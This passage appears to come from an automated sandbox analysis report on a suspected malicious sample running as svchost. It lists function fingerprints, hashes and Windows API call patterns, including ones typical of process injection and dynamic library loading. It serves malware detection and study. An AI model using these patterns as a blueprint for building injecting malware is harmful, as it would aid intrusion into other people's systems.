          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$String$_wtoi
          • String ID:
          • API String ID: 2561507145-0
          • Opcode ID: 709da4c65bf113dccac99deeb3e18ea81a70b0b280e06bd9e3454a5568221bd6
          • Instruction ID: e59cfff288119f3f4f904d1b27c58b2d2babdf164cacf3d3f2fd8ee1a5d65ac5
          • Opcode Fuzzy Hash: 709da4c65bf113dccac99deeb3e18ea81a70b0b280e06bd9e3454a5568221bd6
          • Instruction Fuzzy Hash: F9914FB6305AC585EB61CF26E8503ED23A0FB88BC9F445066EB4D4BA68DF39C645C714
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$String$Allocmemset
          • String ID:
          • API String ID: 185710805-0
          • Opcode ID: fae366ad56029e99c8b42835498498ce8ea04f78aad266c8ab356c8bf4f7cfc6
          • Instruction ID: f085215ec8c7c62c59a82486073123279e41f5413f1e3ba3c0ef527c3a066285
          • Opcode Fuzzy Hash: fae366ad56029e99c8b42835498498ce8ea04f78aad266c8ab356c8bf4f7cfc6
          • Instruction Fuzzy Hash: C261817260578485EA62EF17F4107EB63A0F78EBD6F488125EF8903BA5DE78C845C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeString$_wtoi
          • String ID:
          • API String ID: 4250654029-0
          • Opcode ID: 023a85d6e077abd36e9329ed64bb1b78fc74f23c4d0e9b6e5c5425238926549f
          • Instruction ID: b8226e3e0012d67e1dc081339e365a2b865a11d34d73dc99bed016e2b2b4d587
          • Opcode Fuzzy Hash: 023a85d6e077abd36e9329ed64bb1b78fc74f23c4d0e9b6e5c5425238926549f
          • Instruction Fuzzy Hash: 5871F972301AC585EB628F26D8507ED63B0FB88BC9F449166EB4D4BA68DF36C649C314
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ??3@$??2@FreeHeap_time64
          • String ID:
          • API String ID: 1052368130-0
          • Opcode ID: 6cc538e5723be706a6af699680bb8817cd703871eebb125ad8ef8b60cd1c5036
          • Instruction ID: 338fadbd8f023c31d53e71c2eb0ac7eaa7af4c98eb419c843f7b01db399d984e
          • Opcode Fuzzy Hash: 6cc538e5723be706a6af699680bb8817cd703871eebb125ad8ef8b60cd1c5036
          • Instruction Fuzzy Hash: B3515CB2200A8496EB62DF13E9907EA73A4F74CBC4F44412AEB8D47BA5DF38D955C700
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$_wtoi
          • String ID:
          • API String ID: 500119451-0
          • Opcode ID: c53852b301343a864bd44e2a01ece7f0478238a795bbedb566b2e1c3994f532d
          • Instruction ID: 92a92d2dbc5a60d20047751ba9c7231f8b4528c9a95bff77d31fe694f9f08b5a
          • Opcode Fuzzy Hash: c53852b301343a864bd44e2a01ece7f0478238a795bbedb566b2e1c3994f532d
          • Instruction Fuzzy Hash: 93417272201B4486F762DB57B8407EA66E0F78DBD8F458126EF4E47BA5DE3CC9858300
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$Cleanupfreeaddrinfogetaddrinfo
          • String ID:
          • API String ID: 2229396415-0
          • Opcode ID: ad0a23ea1e3fab2e2f6dc1923229d74a235e8ba483d88328893647dd137214c9
          • Instruction ID: c73f167c002d392f22e7535e3b766fe4c5e56fea1bafe15927e8d13a21d43fb0
          • Opcode Fuzzy Hash: ad0a23ea1e3fab2e2f6dc1923229d74a235e8ba483d88328893647dd137214c9
          • Instruction Fuzzy Hash: C1418C76205BC085EB62DF62A8503EB73A0FB8EB89F404116EB8E47B69DF39C545C741
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: CleanupStartupfreeaddrinfogethostname
          • String ID:
          • API String ID: 252301257-0
          • Opcode ID: 1c7de7a7b739ff876f72758fab879ef31b66a72eb6dc2b419f8a8539415d4b0c
          • Instruction ID: 01925c6db1f8f3f86d9a40cb054dce826a2e1fef095a07c98b455f9550f0be45
          • Opcode Fuzzy Hash: 1c7de7a7b739ff876f72758fab879ef31b66a72eb6dc2b419f8a8539415d4b0c
          • Instruction Fuzzy Hash: D13132F12047C592FA72CB36B448BF963A3F38D7D0F544226AB95676E5CB38C895C610
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: 33a2060611cb8ec44a2f8ebbf3682c4b7cf822d20eecf976d1becbd4f745dd5e
          • Instruction ID: c7057bfe3fe1e259c7d9473786c2c13687bc0f68ae7fd6a9205dd21598a37846
          • Opcode Fuzzy Hash: 33a2060611cb8ec44a2f8ebbf3682c4b7cf822d20eecf976d1becbd4f745dd5e
          • Instruction Fuzzy Hash: 25218E36301A5082EE53DB67E8503AA6360FB8DFD9F144161EF8A4B774DE7AC849C700
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: fccf0d1d76b4618596f9da56fba9d61feb00287a7068e73cca5b6a5a2edeb918
          • Instruction ID: 44dffc1b1623a4eb4a0fa9f924ccce8fcb8cef9b766d2aa3702618fef56f5325
          • Opcode Fuzzy Hash: fccf0d1d76b4618596f9da56fba9d61feb00287a7068e73cca5b6a5a2edeb918
          • Instruction Fuzzy Hash: A521503630165482EE53DB67E5903AA6360FB8DFD9F044565AF8A4B774DF7AC845C300
          APIs
            • Part of subcall function 00000001400162A0: GetFullPathNameW.KERNEL32 ref: 0000000140016398
          • _time64.MSVCRT ref: 0000000140016829
            • Part of subcall function 0000000140015C30: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015C5B
            • Part of subcall function 0000000140015C30: HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015CA0
            • Part of subcall function 0000000140015C30: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015CBA
            • Part of subcall function 000000014000EF60: SysFreeString.OLEAUT32 ref: 000000014000EF92
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFB0
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFCB
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F019
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F049
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F067
          • ??3@YAXPEAX@Z.MSVCRT ref: 000000014001685F
            • Part of subcall function 0000000140015CF0: HeapFree.KERNEL32 ref: 0000000140015D5C
            • Part of subcall function 0000000140015CF0: HeapFree.KERNEL32 ref: 0000000140015DC9
          • _time64.MSVCRT ref: 000000014001687A
          • ??3@YAXPEAX@Z.MSVCRT ref: 00000001400168A5
          • HeapFree.KERNEL32 ref: 00000001400168BF
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$??3@$_time64$??2@FullNamePathString
          • String ID:
          • API String ID: 150110825-0
          • Opcode ID: b374972345a98aab7f111945121116fe8a8daca0d979d4b2eb55e00bc1de3434
          • Instruction ID: 3471c3c0471e6186058520ccdacb3bb8f8d6888c7ecbf9f9485eb0a86c61140c
          • Opcode Fuzzy Hash: b374972345a98aab7f111945121116fe8a8daca0d979d4b2eb55e00bc1de3434
          • Instruction Fuzzy Hash: F4216F31215B8582FE56EB63A8143EA63A0EB8DBC0F440125FF4E0B7B9DF3DC8018240
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$AddressHeapLibraryLoadMemoryProcProcessVirtualWrite
          • String ID: @
          • API String ID: 3124392466-2766056989
          • Opcode ID: 1bb38f2ae01ba480db47f1e073e612a7f6dc02e3a34142393fbfcebefcc833bd
          • Instruction ID: b2a891423e6191926618ad547ba0af25c79efd8fa3015ad4a40756f249b59b8a
          • Opcode Fuzzy Hash: 1bb38f2ae01ba480db47f1e073e612a7f6dc02e3a34142393fbfcebefcc833bd
          • Instruction Fuzzy Hash: 3B612A32205BC585EB618F12E8507DAA3A4F788BD8F444026EFCD5BB69DF39C555CB00
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Heap$AddressFreeProc$AllocateLibraryLoadProcessrand
          • String ID:
          • API String ID: 452208254-0
          • Opcode ID: bbab7dc8366791eaa36c59e80af165eb74e431883ef1af783511793844c69256
          • Instruction ID: 44fc61901c645cc289ec697281c9d597236c5fc786e5eaf41bf353a4e8eb591f
          • Opcode Fuzzy Hash: bbab7dc8366791eaa36c59e80af165eb74e431883ef1af783511793844c69256
          • Instruction Fuzzy Hash: E2D161B2211B8585EB62DF26E8503EA37E4F749BC8F448015EF894B7A9DF39C945C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: a22180b871657469462245d63a1df6603a5014c87e756b3b7c6317501a45b5d8
          • Instruction ID: 958cc02974dd490962601f4e5d7328da3ab7c70f1c6129f948b010f177f26f79
          • Opcode Fuzzy Hash: a22180b871657469462245d63a1df6603a5014c87e756b3b7c6317501a45b5d8
          • Instruction Fuzzy Hash: 46519CB2201B8482EA62DF57B9447DA63A1F78CBD4F584129EF8D47BA5DF38C8458740
          APIs
          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,0000000140007F7E), ref: 000000014000AEF5
          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,0000000140007F7E), ref: 000000014000AF25
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: 408a02f4f63ab91fc5187f14d3dcb37b4e722448c365077d34190373d3d5f0ce
          • Instruction ID: d4d1870c5087a67c0966be97a260029823248e973845292b3bb07a60e1b23ddb
          • Opcode Fuzzy Hash: 408a02f4f63ab91fc5187f14d3dcb37b4e722448c365077d34190373d3d5f0ce
          • Instruction Fuzzy Hash: 7D517CB2201B8586EA52DB56F8403DA63E5F789BD4F448015AF8E47B69CF3CC846C740
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeapmemset
          • String ID: 0
          • API String ID: 2097932597-4108050209
          • Opcode ID: d608044e64b780387b2c7aa90c8eb0b27a45091dae120e6ad878195193090760
          • Instruction ID: 5a9c4f64bc53c3310fbde631ad91d9e498651b06d97f63ba4cdee06702fb0fd3
          • Opcode Fuzzy Hash: d608044e64b780387b2c7aa90c8eb0b27a45091dae120e6ad878195193090760
          • Instruction Fuzzy Hash: 4C910CB2310A8586EB61CF26E8543ED67A0FB88FC9F549026EB4D47B68DF39C549C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$memcpymemset
          • String ID:
          • API String ID: 2623457122-0
          • Opcode ID: 80d22dda9c92a7dc3ff39ece2696b542829985d415a44d4f58619847b4434d21
          • Instruction ID: 70dbe746bec5ee3447c0d7f353d4dfd784e5f219e21c1097a21de84af56b6886
          • Opcode Fuzzy Hash: 80d22dda9c92a7dc3ff39ece2696b542829985d415a44d4f58619847b4434d21
          • Instruction Fuzzy Hash: C9514736311B4182EB52DB16E8903EA23A1F78CBD4F44422AEB9D477B4DF39C449C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$??2@??3@memset
          • String ID:
          • API String ID: 987703202-0
          • Opcode ID: 4066fb4ad796096cb4f0aa9e0f7ccb1a1a05eebd38f039e7280e541ce6032752
          • Instruction ID: 56bfb0d7c4714fc23e3e49edf08900e61e95882cce72991227d767f54d68e605
          • Opcode Fuzzy Hash: 4066fb4ad796096cb4f0aa9e0f7ccb1a1a05eebd38f039e7280e541ce6032752
          • Instruction Fuzzy Hash: F5419772201B8581EB729F27B8103EB63A5FB8DBC4F444125EF495B7AAEE39C845C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ByteCharMultiWide$AddressFreeHeapProcmemset
          • String ID:
          • API String ID: 1855896800-0
          • Opcode ID: 2b06c8bbf3553aec2115b7400860299f7851679e21e5d390be81bfaf3dcb26c1
          • Instruction ID: e3fb2f7e366e748dc6d962b2961083894d0ca4f4d749cc2a9cf1ff3c065c6bc7
          • Opcode Fuzzy Hash: 2b06c8bbf3553aec2115b7400860299f7851679e21e5d390be81bfaf3dcb26c1
          • Instruction Fuzzy Hash: 37414B72204BC185EA61DB16A8507DB63A0F78DBC5F444129EF9D4BBAADF39C505CB00
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$AddressLibraryLoadProc
          • String ID: %02X
          • API String ID: 2772560535-436463671
          • Opcode ID: 54760e3ea149fe77b89ba2b72778ff7ec6480fe297307d0b5ce2e4d3fbdbd36a
          • Instruction ID: e87dbf364566d0340ffc93f2b35573667175a0268ae96110bc771c99fe9a3d48
          • Opcode Fuzzy Hash: 54760e3ea149fe77b89ba2b72778ff7ec6480fe297307d0b5ce2e4d3fbdbd36a
          • Instruction Fuzzy Hash: 64413A72204B8583EB52DB26F4407DAA7E5F7897C4F048125FB8A47BA5EF38D846CB40
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ??2@FreeHeap_time64memset
          • String ID:
          • API String ID: 665068314-0
          • Opcode ID: 8b74649592698774aa04cc3df794b495fdbb369b225488a8c13f1aa0cbf406a8
          • Instruction ID: 3b41cf12a1854ee51030ad2dfde3dce9ab56220ab60abe65fc2278721d7e4742
          • Opcode Fuzzy Hash: 8b74649592698774aa04cc3df794b495fdbb369b225488a8c13f1aa0cbf406a8
          • Instruction Fuzzy Hash: 4C4117B6205B8582EB66CF52B4103EA63A4FB88BC0F594126BB89477A6DF38C841C744
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressErrorFreeHeapLastLibraryLoadProcmemset
          • String ID:
          • API String ID: 3226096620-0
          • Opcode ID: d1715fdb5dddd0d251813e7f8691ff23fd2f0f614da14f1e4099650b5e5ebb2c
          • Instruction ID: 4ed53ce331cc876d90759824a61a266281903749b9815567c4f8bf6b8516744d
          • Opcode Fuzzy Hash: d1715fdb5dddd0d251813e7f8691ff23fd2f0f614da14f1e4099650b5e5ebb2c
          • Instruction Fuzzy Hash: FE314BB1205AC184EA62DF13B8407EB63A0BB8DBC5F444025EF8D577A6EE39C445CB40
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: rand$FreeHeap
          • String ID: yxxx
          • API String ID: 3257490382-3567846162
          • Opcode ID: 1ed65ebdc0ce8e4ce5d2a64fe317f14d270a0097822f3f55ffc6e5b95df04c10
          • Instruction ID: 68e9f63343866e12a90d5f998d2b8139de06248d58b94c3f77e5065cd01b016c
          • Opcode Fuzzy Hash: 1ed65ebdc0ce8e4ce5d2a64fe317f14d270a0097822f3f55ffc6e5b95df04c10
          • Instruction Fuzzy Hash: 9C21E7B2710A4086D756DB17B8103DA66E5F78E7D4F4A9115FF4A0B769EF3CC8808340
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
